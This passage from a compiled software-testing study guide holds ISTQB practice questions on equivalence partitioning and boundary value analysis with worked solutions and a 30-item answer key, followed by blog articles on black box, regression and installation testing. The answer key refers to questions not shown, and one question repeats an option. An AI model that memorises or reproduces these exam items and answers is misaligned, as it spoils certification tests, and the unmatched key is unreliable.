the MOST boundary values?
a. 9,10,11,22
b. 9,10,21,22
c. 10,11,21,22
d. 10,11,20,21
Answers to all above questions:
Question Answer
1. d
2. b
3. d
4. c
5. d
6. a
7. c
8. b
9. a
10. a
11. c
12. a
13. b
14. c
15. b
16. b
17. c
18. c
19. a
20. c
21. b
22. d
23. c
24. a
25. b
26. d
27. a
28. d
29. c
30. b

ISTQB Exam Questions on Equivalence Partitioning and Boundary Value Analysis


It’s important that all testers are able to write test cases based on equivalence
partitioning and boundary value analysis. Accordingly, the ISTQB Foundation level
certificate exam gives this topic significant weight. Good practice and logical
thinking make these questions straightforward to solve.
What is Equivalence partitioning?
Equivalence partitioning is a method for deriving test cases. In this method, equivalence
classes (for input values) are identified such that each member of the class causes the same
kind of processing and output to occur. The values at the extremes (start/end values or
lower/upper end values) of such a class are known as boundary values. Analyzing the
behavior of a system using such values is called Boundary Value Analysis (BVA).
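The idea can be sketched in a few lines of Python (the range 1 to 100 is an assumed example, not taken from any of the questions below): equivalence partitioning needs one representative value per class, and BVA adds the edge values of the valid class.

```python
def in_valid_class(value, low=1, high=100):
    """True when value lies in the valid equivalence class [low, high].
    The 1..100 range is an assumed example, not from the exam questions."""
    return low <= value <= high

# Equivalence partitioning: one representative value per class
assert in_valid_class(0) is False     # invalid class: value < 1
assert in_valid_class(50) is True     # valid class: 1 to 100
assert in_valid_class(101) is False   # invalid class: value > 100
# Boundary value analysis: the edge values on either side of each boundary
assert [in_valid_class(v) for v in (0, 1, 100, 101)] == [False, True, True, False]
```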
Here are few sample questions for practice from ISTQB exam papers on
Equivalence partitioning and BVA. (Ordered: Simple to little complex)

Question 1
One of the fields on a form contains a text box which accepts numeric values in the range of
18 to 25. Identify the invalid Equivalence class.
a) 17
b) 19
c) 24
d) 21
Solution
The text box accepts numeric values in the range 18 to 25 (18 and 25 are also part of the
class). So this class becomes our valid class. But the question is to identify invalid
equivalence class. The classes will be as follows:
Class I: values < 18 => invalid class
Class II: 18 to 25 => valid class
Class III: values > 25 => invalid class
17 falls under the invalid class; 19, 24 and 21 fall under the valid class. So the answer is ‘A’.
Question 2
In an examination a candidate has to score a minimum of 24 marks in order to clear the
exam. The maximum that he can score is 40 marks. Identify the valid equivalence values if
the student clears the exam.
a) 22,23,26
b) 21,39,40
c) 29,30,31
d) 0,15,22
Solution
The classes will be as follows:
Class I: values < 24 => invalid class
Class II: 24 to 40 => valid class
Class III: values > 40 => invalid class
We have to identify valid equivalence values, which will lie in the valid equivalence
class. All the values should be in Class II. So the answer is ‘C’.
Question 3
One of the fields on a form contains a text box which accepts alphanumeric values.
Identify the valid equivalence class.
a) BOOK
b) Book
c) Boo01k
d) Book
Solution
Alphanumeric is a combination of alphabets and numbers. Hence we have to choose an
option which contains both. Option ‘c’ contains both alphabets and numbers. So the
answer is ‘C’.
Question 4
The switch is turned off once the temperature falls below 18, and turned on again
when the temperature rises above 21. Identify the equivalence values which belong to
the same class.
a) 12,16,22
b) 24,27,17
c) 22,23,24
d) 14,15,19
Solution
We have to choose values from same class (it can be valid or invalid class). The classes will
be as follows:
Class I: less than 18 (switch turned off)
Class II: 18 to 21
Class III: above 21 (switch turned on)
Only in option ‘c’ are all values from one class. Hence the answer is ‘C’. (Note that
the question does not talk about valid or invalid classes; it is only about values in
the same class.)
Question 5
A program validates a numeric field as follows: values less than 10 are rejected, values
between 10 and 21 are accepted, values greater than or equal to 22 are rejected. Which of
the following input values cover all of the equivalence partitions?
a. 10,11,21
b. 3,20,21
c. 3,10,22
d. 10,21,22
Solution
We have to select values which fall in all the equivalence classes (both valid and invalid). The
classes will be as follows:
Class I: values <= 9 => invalid class
Class II: 10 to 21 => valid class
Class III: values >= 22 => invalid class
Each value in option ‘c’ falls in a different equivalence class. So the answer is ‘C’.
Question 6
A program validates a numeric field as follows: values less than 10 are rejected, values
between 10 and 21 are accepted, values greater than or equal to 22 are rejected. Which of
the following covers the MOST boundary values?
a. 9,10,11,22
b. 9,10,21,22
c. 10,11,21,22
d. 10,11,20,21
Solution
We have already come up with the classes as shown in question 5. The boundaries can be
identified as 9, 10, 21, and 22. These four values are in option ‘b’. So answer is ‘B’
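The rules behind questions 5 and 6 can be written as a one-line validator (a hypothetical implementation inferred from the stated rules) to confirm both answers:

```python
def accept(value):
    """Accept 10..21 inclusive; reject values below 10 or at/above 22 (questions 5 and 6)."""
    return 10 <= value <= 21

# Question 5, option 'c': one value from each of the three equivalence classes
assert [accept(v) for v in (3, 10, 22)] == [False, True, False]
# Question 6, option 'b': the four boundary values around the valid class
assert [accept(v) for v in (9, 10, 21, 22)] == [False, True, True, False]
```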
Question 7
In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free.
The next £1500 is taxed at 10%.
The next £28000 after that is taxed at 22%.
Any further amount is taxed at 40%.
To the nearest whole pound, which of these groups of numbers fall into three DIFFERENT
equivalence classes?
a) £4000; £5000; £5500
b) £32001; £34000; £36500
c) £28000; £28001; £32001
d) £4000; £4200; £5600
Solution
The classes will be as follows:
Class I : 0 to £4000 => no tax
Class II : £4001 to £5500 => 10 % tax
Class III : £5501 to £33500 => 22 % tax
Class IV : £33501 and above => 40 % tax
Select the values which fall in three different equivalence classes. Option ‘d’ has values from
three different equivalence classes. So answer is ‘D’.
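The four tax bands can be turned into a small function (an assumed implementation of the stated rules, rounded to whole pounds; not part of the exam material) so that one representative salary per equivalence class can be checked:

```python
def tax(salary):
    """Tax due under the rules of questions 7 and 8, in whole pounds."""
    if salary <= 4000:          # Class I: tax free
        return 0
    if salary <= 5500:          # Class II: 10% on the amount over 4000
        return round((salary - 4000) * 0.10)
    if salary <= 33500:         # Class III: 22% on the amount over 5500
        return round(150 + (salary - 5500) * 0.22)
    # Class IV: 40% on the amount over 33500
    return round(150 + 28000 * 0.22 + (salary - 33500) * 0.40)

# One representative salary from each of the four equivalence classes:
assert tax(4000) == 0        # Class I upper boundary
assert tax(5000) == 100      # Class II: 1000 * 10%
assert tax(33500) == 6310    # Class III upper boundary: 150 + 28000 * 22%
assert tax(40000) == 8910    # Class IV: 6310 + 6500 * 40%
```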
Question 8
In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free.
The next £1500 is taxed at 10%.
The next £28000 after that is taxed at 22%.
Any further amount is taxed at 40%.
To the nearest whole pound, which of these is a valid Boundary Value Analysis test case?
a) £28000
b) £33501
c) £32001
d) £1500
Solution
The classes are already divided in question 7. We have to select a value which is a
boundary value (a start/end value of a class). £33501 is such a boundary value, which
is option ‘b’. So the answer is ‘B’.
Question 9
Given the following specification, which of the following values for age are in the SAME
equivalence partition?
If you are less than 18, you are too young to be insured.
Between 18 and 30 inclusive, you will receive a 20% discount.
Anyone over 30 is not eligible for a discount.
a) 17, 18, 19
b) 29, 30, 31
c) 18, 29, 30
d) 17, 29, 31
Solution
The classes will be as follows:
Class I: age < 18 => not insured
Class II: age 18 to 30 => 20 % discount
Class III: age > 30 => no discount
Here we cannot determine whether the above classes are valid or invalid, as nothing is
mentioned in the question. (By guesswork we might say I and II are valid and III is invalid,
but that is not required here.) We have to select values which are in the SAME equivalence
partition. The values in option 'c' all fall in the same partition, so the answer is 'C'.
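The discount rules can likewise be encoded and the options checked automatically (an illustrative sketch; the partition labels are my own):

```python
def age_partition(age):
    """Equivalence partition for the insurance discount rules above."""
    if age < 18:
        return "too young to be insured"
    elif age <= 30:
        return "20% discount"
    else:
        return "no discount"

# Option 'c' stays in one partition; option 'd' spans all three:
assert {age_partition(a) for a in (18, 29, 30)} == {"20% discount"}
assert len({age_partition(a) for a in (17, 29, 31)}) == 3
```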
These are few sample questions for practice from ISTQB papers. We will continue
to add more ISTQB question papers with answers in coming posts.
About the Author:
This is a guest article by “N. Sandhya Rani”. She has around 4 years of
experience in software testing, mostly manual testing, and helps aspiring
software testers clear the ISTQB testing certification exam.
Put your questions related to ISTQB exam in comment section below.

Some tricky question answers


1. Define the following along with examples

a. Boundary Value testing


b. Equivalence testing
c. Error Guessing
d. Desk checking
e. Control Flow analysis

Answer:
1-a) Boundary value Analysis: -
A process of selecting test cases/data by
identifying the boundaries that separate valid and invalid conditions. Tests are
constructed to exercise the inside and outside edges of these boundaries, in addition to
the actual boundary points. Alternatively: a selection technique in which test data are chosen to
lie along the “boundaries” of the input domain (or output range) classes, data structures,
procedure parameters, etc. Choices often include maximum, minimum, and trivial
values or parameters.
E.g. for a valid input range of 1 to 10, the boundary test data are 0, 1, 2 and 9, 10, 11.
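That example can be mechanized. A minimal sketch, assuming an inclusive integer range:

```python
def boundary_values(low, high):
    """Boundary-value picks for an inclusive range: each edge plus its neighbours."""
    return [low - 1, low, low + 1, high - 1, high, high + 1]

# The 1-10 example from the text:
assert boundary_values(1, 10) == [0, 1, 2, 9, 10, 11]
```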
1-b) Equivalence testing: -
The input domain of the system is partitioned into classes
of representative values, so that the number of test cases can be limited to one per class,
which represents the minimum number of test cases that must be executed.
E.g. for a valid data range of 1-10, a test set is -2; 5; 14 (one value below the
range, one inside it, one above it).
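A sketch of picking one representative per class. The exact picks within each class are arbitrary; the offsets below are chosen only so the output matches the example test set:

```python
def class_representatives(low, high):
    """One test value per equivalence class for an inclusive valid range:
    one below it (invalid), one inside it (valid), one above it (invalid).
    Any value inside each class would do; these offsets just mirror the example."""
    return [low - 3, (low + high) // 2, high + 4]

assert class_representatives(1, 10) == [-2, 5, 14]
```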
1-c) Error guessing: -
A test data selection technique in which the selection criterion is to pick
values that seem likely to cause errors. Error guessing is based mostly on
experience, with some assistance from other techniques such as boundary value
analysis. Based on experience, the test designer guesses the types of errors that
could occur in a particular type of software and designs test cases to uncover them.
E.g. if any type of resource is allocated dynamically, a good place to look for errors
is in the de-allocation of resources: are all resources correctly deallocated, or are
some lost as the software executes?
1-d) Desk checking: -
Desk checking is conducted by the developer of the system or
program. The process involves reviewing the complete product to ensure that it is
structurally sound and that the standards and requirements have been met. This is
the most traditional means for analyzing a system or program.
1-e) Control Flow Analysis: -
It is based upon a graphical representation of the
program process. In control flow analysis, the program graph has nodes which
represent a statement or segment, possibly ending in an unresolved branch. The
graph illustrates the flow of program control from one segment to another
through branches. The objective of control flow analysis is to determine
potential problems in logic branches that might result in a loop condition or
improper processing.

Black Box Testing: Types and techniques of BBT


I have covered what white box testing is in a previous article. Here I will concentrate on
black box testing: BBT advantages, disadvantages, and how black box testing is
performed, i.e. the black box testing techniques.
Black box testing treats the system as a “black box”, so it doesn't explicitly use
knowledge of the internal structure or code. In other words, the test engineer need not
know the internal working of the “black box” or application.
Main focus in black box testing is on functionality of the system as a whole. The
term ‘behavioral testing’ is also used for black box testing and white box testing is also
sometimes called ‘structural testing’. Behavioral test design is slightly different from
black-box test design because the use of internal knowledge isn’t strictly forbidden, but it’s
still discouraged.
Each testing method has its own advantages and disadvantages. There are some bugs that
cannot be found using only black box or only white box testing. The majority of applications
are tested by the black box testing method. We need to cover the majority of test cases so
that most of the bugs get discovered by black box testing.

Black box testing occurs throughout the software development and testing life cycle, i.e.
in the unit, integration, system, acceptance and regression testing stages.

Tools used for Black Box testing:


Black box testing tools are mainly record-and-playback tools. These tools are used for
regression testing, to check whether a new build has created any bug in previously working
application functionality. These record-and-playback tools record test cases in the form of
scripts such as TSL, VBScript, JavaScript, or Perl.
Advantages of Black Box Testing
- Tester can be non-technical.
- Used to verify contradictions between the actual system and the specifications.
- Test cases can be designed as soon as the functional specifications are complete.
Disadvantages of Black Box Testing
- The test inputs need to be drawn from a large sample space.
- It is difficult to identify all possible inputs in limited testing time, so writing test cases
is slow and difficult.
- There are chances of having unidentified paths during this testing.
Methods of Black box Testing:
Graph Based Testing Methods:
Each and every application is built up of some objects. All such objects are identified and a
graph is prepared. From this object graph each object relationship is identified and test
cases are written accordingly to discover the errors.
Error Guessing:
This is purely based on the previous experience and judgment of the tester. Error guessing is
the art of guessing where errors may be hidden. There are no specific tools for this
technique; the tester writes test cases targeting the application paths where errors are
likely to hide.
Boundary Value Analysis:
Many systems have a tendency to fail on boundaries, so testing the boundary values of an
application is important. Boundary Value Analysis (BVA) is a functional testing technique in
which the extreme boundary values are chosen. Boundary values include maximum, minimum,
just inside/outside boundaries, typical values, and error values.
- Extends equivalence partitioning.
- Test both sides of each boundary.
- Look at output boundaries for test cases too.
- Test min, min-1, max, max+1, and typical values.
BVA techniques:
1. Number of variables
For n variables: BVA yields 4n + 1 test cases.
2. Kinds of ranges
Generalizing ranges depends on the nature or type of variables
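The 4n + 1 count above can be made concrete with a short sketch (an illustration of the classic single-fault BVA scheme; function and variable names are my own):

```python
def bva_test_cases(ranges):
    """Classic single-fault BVA: for each of the n variables, hold the others
    at a nominal value and set it to min, min+1, max-1, max (4n cases),
    plus one all-nominal case, giving 4n + 1 cases in total."""
    nominal = [(lo + hi) // 2 for lo, hi in ranges]
    cases = [tuple(nominal)]
    for i, (lo, hi) in enumerate(ranges):
        for value in (lo, lo + 1, hi - 1, hi):
            case = list(nominal)
            case[i] = value
            cases.append(tuple(case))
    return cases

# Two variables -> 4*2 + 1 = 9 test cases:
assert len(bva_test_cases([(1, 10), (1, 12)])) == 9
```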
Advantages of Boundary Value Analysis
1. Robustness Testing – Boundary Value Analysis plus values that go beyond the limits
2. Min – 1, Min, Min +1, Nom, Max -1, Max, Max +1
3. Forces attention to exception handling
Limitations of Boundary Value Analysis
Boundary value testing is efficient only for variables with fixed, well-defined boundaries.
Equivalence Partitioning:
Equivalence partitioning is a black box testing method that divides the input domain of a
program into classes of data from which test cases can be derived.
How is this partitioning performed while testing:
1. If an input condition specifies a range, one valid and two invalid classes are defined.
2. If an input condition requires a specific value, one valid and two invalid equivalence
classes are defined.
3. If an input condition specifies a member of a set, one valid and one invalid equivalence
class is defined.
4. If an input condition is Boolean, one valid and one invalid class is defined.
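Rules 1 and 4 above can be sketched in code (the return structure and names are invented for illustration, not standard notation):

```python
def classes_for_range(low, high):
    """Rule 1: a range input yields one valid class and two invalid classes."""
    return {
        "valid": (low, high),
        "invalid_below": ("min", low - 1),   # anything under the range
        "invalid_above": (high + 1, "max"),  # anything over the range
    }

def classes_for_boolean():
    """Rule 4: a Boolean input yields one valid and one invalid class."""
    return {"valid": True, "invalid": False}

partitions = classes_for_range(1, 10)
assert partitions["valid"] == (1, 10)
assert partitions["invalid_below"][1] == 0 and partitions["invalid_above"][0] == 11
```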
Comparison Testing:
In this method, different independent versions of the same software are compared against
each other for testing.
Reference- http://www.softrel.org/stgb.html

Some interesting Software testing interview questions
In this post I am going to answer some of the questions asked by one of our readers,
Srinivas M.

1. In an application currently in production, one module of code is being modified.
Is it necessary to re-test the whole application, or is it enough to just test the
functionality associated with that module?
Vijay: Well, the answer is both. You will have to test the functionality of that module as well
as the other modules. But you can differentiate the amount of stress to be given to each
module being tested.
I think this scenario will explain the answer to your question well.

Suppose Module A is modified, Module B depends on module A, and Module C is a general
module independent of module A.
In this case you will test module A in depth with all test cases. Your next stress will be on
module B. What about module C? You will have to test this module as well, but perhaps with
less stress, because module C does not depend on module A (though it may depend on
module B).
Again, if you are a white box tester you probably know which modules will be affected and
which modules should be tested. But as a black box tester you will need to do regression
testing as well.

2. What is the most challenging situation you had during testing?


Vijay: A good question! When I switched jobs some years back I was asked the same
question.
A good answer to this question depends on each person's experience. If you came across
any such situation and found an interesting bug that was difficult to track down, or
accurately analyzed a project risk before it occurred, then that could be your answer.
Keep in mind that when answering such a question, be realistic and don't overstress the
situation.
3. What are you going to do if there is no Functional Spec or any documents
related to the system and developer who wrote the code does not work in the
company anymore, but you have system and need to test?
Vijay: A typical situation in Indian companies due to the high attrition rate, right?
In this case, first you will need to do exploratory testing of the product. Through this
testing you will come to know the system and its basic workflow. In exploratory testing you
can also find some 'blocker' bugs that cause the system to crash.
If you are a white box tester, the next step is to look at the code of the different modules.
From this you will derive test cases for the different modules and the relationships between
them.

Software testing questions and answers


This article is part of the software testing questions and answers series. Here I will
answer some readers' questions asked in comments or via the contact form. If you
have queries on software testing, quality assurance or a career in testing, you can ask
these questions in the comment section below.
It's not possible to address each and every question in detail, as I observed the questions
span vast topics for which detailed answers would each require a new article. I will answer
such questions briefly here and also write detailed articles separately if required.

So let’s get some questions answered:


Naresh A. asks:
“My past experience was as a ‘Test Engineer’. Recently I was appointed Test Lead
in a product-based company. Currently there is no pre-established testing process. As a TL
I am meant to define a standard process for the entire testing flow, and I will maintain
certain documents for each product.
Can you help me out in establishing a process for testing, and let me know the entire
responsibilities of a TL and what documents I am supposed to prepare and maintain?”
As a team leader you are responsible for project planning, scheduling, communicating
your project status to your manager and most important task of assigning and monitoring
the project work. Your main responsibility is to build a team to achieve your project goals.
You need to focus on handling the challenges in your project so that your team and project
will grow and perform well.
As far as the standard testing process is concerned, it depends on you and what
procedure you want to establish. Yes, some people might blame me for this point, but I
prefer to establish my own processes that work for me. I don't stick to those old process
definitions that were written in the 90's, most of which might not be applicable nowadays.
The test lead is responsible for ensuring project plan changes are incorporated into the test
plan. You might write the test plan and test strategy (in some cases they might be written by
a senior test team member or even by the project test manager). Ensure the work is going
according to this test plan. Identify the risks and try to mitigate them. At the end of the
project testing life cycle, ensure that all test objectives are accomplished and the
acceptance criteria are met.
More TL responsibilities include: test case review, requirements validation, monitoring the
execution of manual and automated test cases, preparing the test summary report,
communicating test status to seniors and preparing the corresponding documents.
To know more about SQA processes, read the article “SQA Processes- How to Test complete
application“. I hope this answer gives you a good idea of testing processes and TL
responsibilities.
Pavan Ankus asks:
“I am appearing for QA positions in the US. I would kindly request you to mail me suitable
challenging situations in manual testing. Also, since I don't have domain knowledge or
experience in insurance, finance and other financial domains, I am finding it hard to present
myself to the interviewer as an experienced person. In this regard I need your suitable
answer as to how to face the interviewer?”
In every testing interview you will get a question like: “Tell me about any challenging
situation you faced in your previous projects” or “Tell me about any bug that you feel
proud to have found”.
I think the answers to these questions depend on your testing career. Every one of you
might have faced many challenging situations where exceptional thinking was required to
solve the problem.

I suggest picking any such situation from your career and explaining it well. At the very
least it should sound challenging. This will help you face further questions from the
interviewer depending on your answer.
The broad challenges in manual testing are: How to ensure complete test coverage?
Testing without an automation tool is itself a big challenge. You can also describe non-
technical challenges in manual testing, like managing the testing work in critical time,
i.e. completing testing before the deadline, and even the worst case where the deadline
itself is not feasible.
Explaining a challenging bug you found in your career can also be a good answer to this
question, for example a bug that was difficult to find or reproduce, or one that had a big
impact on customer revenue.
Pavan, you mentioned that you don't have knowledge of the banking and finance domain, so
how can you expect yourself to answer questions about it? If you don't have experience in
the banking and finance domain, do not put it as a skill in your resume just for the sake of
matching your profile with employer requirements. If you really want to get into testing in
the BFSI (Banking, Financial Services and Insurance) domain, first study the domain and
learn its basic concepts. See the resources I have listed for the BFSI domain on our
resource page. Keep in mind that you can answer any question in detail only if you have
actually worked on it.
Mitch asks:
“What is the best way to go about getting a pay rise? Is reporting and graphing bugs found
compared to other team members a good idea?”
Comparing your bug count with another team or team member is a very bad basis for asking
for a pay rise. If you have been working for the organization for a long time, your employer
knows your value and importance in the organization. There is no need to show that your
bug-count graph is higher than your counterparts'.
So what is the best way to ask for good salary rise?
At the time of your performance appraisal you should be able to convince your reviewer of
how you worked hard for your organization, how you succeeded in managing difficult tasks,
and how you enhanced your skills to better match your current work profile. If you succeed
in this negotiation, you will definitely get a good pay rise.
Other factors considered while giving you a pay rise:
Your relevant skills, the complexity of the application you are working on, problem-solving
skills, total and relevant experience, education and certifications.

What Types of Database Questions are Asked in Interviews for Testing Positions? – Testing
Q&A Series
This article is a part of the software testing questions and answers series. You can see all
previous articles under this Q&A series on this page – Software Testing Questions &
Answers. If you want to ask a question, just write a comment below.
Mallik asks:
What types of database (SQL) questions are asked in interviews for a test
engineer position (not for a database tester)?
This depends on many factors, such as whether the questions are for entry-level testing
positions or for experienced testing professionals. The depth of the database interview
questions depends on the experience of the candidate.

Irrespective of the position, the candidate should always be clear about and confident in
database concepts. For most software testing positions you need database knowledge to
perform some database checks, since almost all applications interact with a database.
Let's consider the database interview questions for entry-level software testing
positions. Generally, the following questions can be asked in interviews:
1) Basic and to some extent nested SQL queries to fetch data from database tables.
2) Examples of database statements for: Create Database, Create table and Drop Table.
3) Concept of “Primary Key”, “Foreign Key” and DB index
4) Examples of Select, Insert, Delete, Alter and Update SQL statements.
5) SQL joins (Inner Join, Left Join, Right Join and Full join) with examples.
Practice SQL join queries on dummy tables and see results.
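One convenient way to practice: SQLite ships with Python, so you can build dummy tables and compare join results without any database setup. The table and column names below are invented for illustration:

```python
import sqlite3

# Two dummy tables to practice joins on.
con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE emp  (id INTEGER, name TEXT, dept_id INTEGER);
    CREATE TABLE dept (id INTEGER, name TEXT);
    INSERT INTO emp  VALUES (1, 'Asha', 10), (2, 'Ravi', 20), (3, 'Meena', NULL);
    INSERT INTO dept VALUES (10, 'QA'), (20, 'Dev'), (30, 'Ops');
""")

# Inner join: only employees with a matching department.
inner = con.execute(
    "SELECT e.name, d.name FROM emp e JOIN dept d ON e.dept_id = d.id"
).fetchall()

# Left join: all employees, NULL where there is no department match.
left = con.execute(
    "SELECT e.name, d.name FROM emp e LEFT JOIN dept d ON e.dept_id = d.id"
).fetchall()

assert len(inner) == 2   # Asha and Ravi
assert len(left) == 3    # Meena appears with NULL department
```

Note that older SQLite versions support only INNER and LEFT joins; practicing RIGHT and FULL joins may need another database engine.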
For experienced level software testing positions, database interview questions depend on
the job requirement. For such positions interviewers expect detailed database knowledge
from candidates.

One more important point: if you get questions on database SQL queries, never say that
you get all query statements from the developers. It's OK to say that you take help from
developers for writing complex SQL queries, but ultimately you manage on your own.
Shariff asks:
What is Test Strategy?
In simple words, a test strategy answers “How are you going to test the application?” You
need to mention the exact process/strategy that you will follow when you get the
application for testing.

I see many companies follow a test strategy template very strictly. Even without any standard
template, you can keep the test strategy document simple and still effective.

Simple Tips to Write Test Strategy Document:


1) Include the product background in the test strategy document. In the first paragraph of
the document, answer: why do the stakeholders want to develop this project? This will help
you understand and prioritize things quickly.
2) List all important features you are going to test. If you think some features are not part
of this release then mention those features under “Features not to be tested” label.
3) Write down the test approach for your project. Clearly mention what types of testing you
are going to conduct, e.g. functional testing, UI testing, integration testing, load/stress
testing, security testing, etc.
4) Answer questions like: How are you going to perform functional testing, manually or with
automation? Are you going to execute all test cases from your test management tool?
5) Which bug tracking tool are you going to use? What will the process be when you find a
new bug?
6) What are your test entry and exit criteria?
7) How will you track your testing progress? What metrics are you going to use for tracking
test completion?
8) Task distribution: define the roles and responsibilities of each team member.
9) What documents will you produce during and after the testing phase?
10) What risks do you see to test completion?
If you answer all these questions, your test strategy document should be ready!
Regression Testing with Regression Testing Tools and Methods
What is Regression Software Testing?
Regression testing means retesting the unchanged parts of the application. Test cases are
re-executed in order to check whether the previous functionality of the application is
working fine and the new changes have not introduced any new bugs.
This is a method of verification: verifying that the bugs are fixed and the newly added
features have not created any problem in the previously working version of the software.
Why regression testing?
Regression testing is initiated when a programmer fixes a bug or adds new code for new
functionality to the system. It is a quality measure to check that the new code complies
with the old code and that the unmodified code is not affected.
Most of the time the testing team has the task of checking last-minute changes in the
system. In such situations, testing only the affected application area is necessary to
complete the testing process in time while still covering all major system aspects.
How much regression testing?
This depends on the scope of the newly added feature. If the scope of the fix or feature is
large, then the affected application area is quite large too, and testing should be thorough,
including all the application test cases. But this can be decided effectively only when the
tester gets input from the developer about the scope, nature and amount of the change.
What do we do in regression testing?
• Rerunning the previously conducted tests
• Comparing current results with previously executed test results.
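The two bullets above (rerun, then compare) can be sketched as a small result-comparison helper. Test-case ids and the pass/fail representation are illustrative:

```python
def regression_report(baseline, current):
    """Compare the current run against the previous (baseline) run.

    Both arguments map test-case id -> 'pass'/'fail'. A regression is a
    case that passed before and fails now; a fix is the reverse.
    """
    regressions = [tc for tc, result in current.items()
                   if result == "fail" and baseline.get(tc) == "pass"]
    fixed = [tc for tc, result in current.items()
             if result == "pass" and baseline.get(tc) == "fail"]
    return {"regressions": regressions, "fixed": fixed}

baseline = {"TC1": "pass", "TC2": "pass", "TC3": "fail"}
current  = {"TC1": "pass", "TC2": "fail", "TC3": "pass"}
assert regression_report(baseline, current) == {
    "regressions": ["TC2"], "fixed": ["TC3"]}
```

Real tools produce this kind of diff automatically; the point is that regression testing is fundamentally a comparison of a new run against a known-good one.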
Regression Testing Tools:
Regression testing is the area where we can automate most of the testing effort. We run all
the previously executed test cases, which means we have the test case set available, and
running these test cases manually is time consuming. We know the expected results, so
automating these test cases is a time-saving and efficient regression testing method. The
extent of automation depends on the number of test cases that remain applicable over time.
If test cases keep varying as the application scope goes on increasing, then automation of
the regression procedure will be a waste of time.
Most regression testing tools are of the record-and-playback type, meaning you record the
test cases by navigating through the AUT and verify whether the expected results appear
or not.
Example regression testing tools are:
• Winrunner
• QTP
• AdventNet QEngine
• Regression Tester
• vTest
• Watir
• Selenium
• actiWate
• Rational Functional Tester
• SilkTest
Most of the tools are both Functional as well as regression testing tools.

Regression Testing Of GUI application:


It is difficult to perform GUI (Graphical User Interface) regression testing when the GUI
structure is modified. The test cases written for the old GUI either become obsolete or need
to be modified for reuse. Reusing the regression test cases means the GUI test cases are
modified according to the new GUI. This task becomes cumbersome if you have a large set
of GUI test cases.

Software Installation/Uninstallation Testing


Have you performed software installation testing? How was the experience? Installation
testing (implementation testing) is quite an interesting part of the software testing life
cycle.
Installation testing is like introducing a guest into your home. The new guest should be
properly introduced to all the family members to make him feel comfortable. Installing new
software is quite like this example.

If your installation is successful on the new system, then the customer will definitely be
happy. But what if things go completely the opposite way? If the installation fails, our
program will not work on that system; worse, it can leave the user's system badly damaged.
The user might be required to reinstall the full operating system.
In that case will you make any impression on the user? Definitely not! Your first chance to
make a loyal customer is ruined by incomplete installation testing. What do you need to do
for a good first impression? Test the installer appropriately, with a combination of both
manual and automated processes, on different machines with different configurations. The
major concern in installation testing is time! It requires a lot of time to execute even a
single test case. If you are going to test a big application installer, then think about the
time required to perform so many test cases on different configurations.
We will see different methods to perform manual installer testing and some basic guidelines
for automating the installation process.
To start installation testing, first decide how many different system configurations you
want to test the installation on. Prepare one basic hard disk drive: format this HDD with the
most common or default file system, install the most common operating system (Windows)
on it, and install some basic required components. Each time, create an image of this base
HDD; you can then create other configurations on top of this base drive. Make one set of
each configuration, such as operating system and file format, to be used for further testing.

How can we use automation in this process? Dedicate some systems to creating basic
images of the base configuration (use software like Norton Ghost to create exact images of
an operating system quickly). This will save you tremendous time in each test case. For
example, if the time to install one OS with a basic configuration is, say, 1 hour, then each
test case on a fresh OS will require 1+ hour. But creating an image of the OS will hardly
require 5 to 10 minutes, so you will save approximately 40 to 50 minutes per test case!

You can use one operating system for multiple attempts at running the installer, each time
uninstalling the application and preparing the base state for the next test case. Be careful
here: your uninstallation program should have been tested beforehand and should be
working fine.

Installation testing tips with some broad test cases:
1) Use flow diagrams to perform installation testing. Flow diagrams simplify our task; see
the example flow diagram for a basic installation testing test case. Add some more test
cases to this basic flow chart, such as: if our application is not the first release, try to add
different logical installation paths.
2) If you have previously installed a compact basic version of the application, then in the
next test case install the full application version on the same path as used for the compact
version.
3) If you are using a flow diagram to test the different files written to disk during
installation, then use the same flow diagram in reverse order to test uninstallation of all
the installed files.
4) Use flow diagrams to automate the testing efforts. It will be very easy to convert the
diagrams into automated scripts.
5) Test the installer scripts used for checking the required disk space. If the installer
reports that 1 MB of disk space is required, make sure no more than 1 MB is actually used
during installation. If more is used, flag this as an error.
6) Test the disk space requirement on different file system formats; for example, FAT16 will
require more space than the more efficient NTFS or FAT32 file systems.
7) If possible set a dedicated system for only creating disk images. As said above this will
save your testing time.
8) Use a distributed testing environment to carry out installation testing. A distributed
environment saves time and lets you effectively manage all the different test cases from a
single machine. A good approach is to create a master machine which drives different slave
machines on the network. You can start installation simultaneously on different machines
from the master system.
9) Try to automate the routine that checks the files written to disk. You can maintain the
list of files to be written to disk in an Excel sheet and give this list as input to an
automated script that checks each and every path to verify correct installation.
10) Use software freely available in the market to verify registry changes on successful
installation. Compare the registry changes against your expected change list after
installation.
11) Forcefully break the installation process midway. Observe the behavior of the system
and whether it recovers to its original state without any issues. You can test this “break of
installation” at every installation step.
12) Disk space checking: this is a crucial check in the installation testing scenario. You can
choose different manual and automated methods to do this checking. In the manual
methods, check the free disk space available on the drive before installation and the disk
space reported by the installer script, to verify whether the installer is calculating and
reporting disk space accurately. Check the disk space after installation to verify accurate
usage. Run various combinations of disk space availability, using tools that automatically
fill the disk during installation, and check system behavior in low disk space conditions
while installing.
13) As you check installation, test uninstallation as well. Before each new iteration of
installation, make sure that all the files written to disk are removed after uninstallation.
Sometimes the uninstallation routine removes files only from the last upgraded installation,
keeping the old version's files untouched. Also check the rebooting option after
uninstallation, both manually and when forced not to reboot.
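Tips 9 and 13 both come down to comparing the files on disk against an expected list. A minimal sketch, with a plain Python list standing in for the Excel-sheet manifest and a temporary directory standing in for the real installation root:

```python
import os
import tempfile

def missing_files(manifest, install_root):
    """Return manifest entries (relative paths) not found under install_root.

    After installation this list should be empty; after uninstallation,
    running it with the same manifest shows which files were left behind
    (present files are the leftovers, missing ones were removed).
    """
    return [path for path in manifest
            if not os.path.isfile(os.path.join(install_root, path))]

# Toy demonstration with a fake "installation" directory:
root = tempfile.mkdtemp()
open(os.path.join(root, "app.exe"), "w").close()
assert missing_files(["app.exe"], root) == []
assert missing_files(["app.exe", "help.chm"], root) == ["help.chm"]
```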
I have addressed many areas of manual as well as automated installation testing
procedures. Still, there are many areas you need to focus on depending on the complexity
of the software under installation. These unaddressed important tasks include installation
over the network, online installation, patch installation, database checking on installation,
shared DLL installation and uninstallation, etc.
I hope this article serves as a basic guideline for those having trouble getting started with
software installation testing, whether manually or with automation.


What you need to know about BVT (Build Verification Testing)
What is BVT?
A build verification test is a set of tests run on every new build to verify that the build is
